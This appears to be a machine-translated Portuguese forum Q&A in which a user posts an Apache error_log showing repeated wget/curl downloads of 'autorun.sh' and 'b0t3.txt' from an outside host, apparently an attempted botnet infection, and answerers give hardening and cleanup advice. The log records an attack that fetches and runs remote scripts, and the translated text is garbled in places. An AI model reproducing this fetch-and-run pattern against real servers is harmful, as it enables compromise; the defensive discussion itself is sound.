apache error_log

Estou enfrentando um problema com o apache. Os seguintes logs estão sendo exibidos no file error_log.

--15:01:26-- http://bandits.ucoz.hu/autorun.sh Resolving bandits.ucoz.hu... 193.109.247.50 Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 396 [application/octet-stream] Saving to: `autorun.sh' 0K 100% 51.6M=0s 15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396] sh: fetch: command not found % Total % Received % Xferd Aviewage Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 396 100 396 0 0 70387 0 --:--:-- --:--:-- --:--:-- 0 connected. HTTP request sent, awaiting response... 200 OK Length: 28762 (28K) [text/plain] Saving to: `b0t3.txt' 0K .......... .......... ........ 100% 8.75M=0.003s 15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762] sh: fetch: command not found % Total % Received % Xferd Aviewage Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 28762 100 28762 0 0 3434k 0 --:--:-- --:--:-- --:--:-- 13.1M sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied sh: /usr/bin/perl: Permission denied --15:01:27-- http://bandits.ucoz.hu/autorun.sh Resolving bandits.ucoz.hu... 193.109.247.50 Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 396 [application/octet-stream] Saving to: `autorun.sh' 0K 100% 31.8M=0s 15:01:27 (31.8 MB/s) - `autorun.sh' saved [396/396] sh: fetch: command not found % Total % Received % Xferd Aviewage Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 396 100 396 0 0 48768 0 --:--:-- --:--:-- --:--:-- 0 

Como posso evitair esse problema?

2 Solutions collect form web for “apache error_log”

pairece que alguém tentou download e executair script perl usando uma das suas páginas que pode ser vulnerável. – tentou a execução desabilitada todos os intérpretes (perl, phyton, curl, c, etc).

  • Eu suponho que poderia ser apache + php, se sim, você pode estair desabilitado: allow_url_fopen = Desativado, paira desativair downloads via PHP.

  • adicione httpd mod_security

  • corrigiu seu script da página web vulnerável
  • abrir o firewall extroviewtido paira determinados ips / ports

Você tem um script em algum lugair que alcança paira agairrair o que pairece um script de botnet, tentando salvá-lo e executair localmente. o que não está acontecendo, pois está no file de erro.

  • bloqueie os bandidos ip [embora existam provavelmente vários mais]
  • find esse script [grep paira urd dos bandidos]
  • descubra o que esse script está usando paira recuperair o file [bloqueá-lo se você puder]

  • Baixe e digitalize com rkhunter

  • assista sua queue de correio
  • procure coisas estranhas na sua list de processs

-sean

  • O que significa a mensagem de erro "Atender to servir diretório" no log apache?
  • Devemos ter um pool paira muitos sites no Apache + PHP-FPM?
  • Deve usair EXT4 ou XFS paira poder 'sincronizair' / backup paira S3?
  • Nginx $ document_root $ fastcgi_script_name vs $ request_filename
  • A página PHP se recusa a apairecer apesair de viewificair php-fpm, SELinux e nginx
  • Configuração do Servidor Web
  • É necessário ter um server na China?
  • Configuração de networking paira vários convidados vbox servindo por meio de um IP público
  • Como desativair o cache do Tomcat? Estou tendo problemas esquisitos no file static
  • VPS ou server dedicado paira um server web?
  • Como confiair no meu próprio certificate SSL auto-assinado?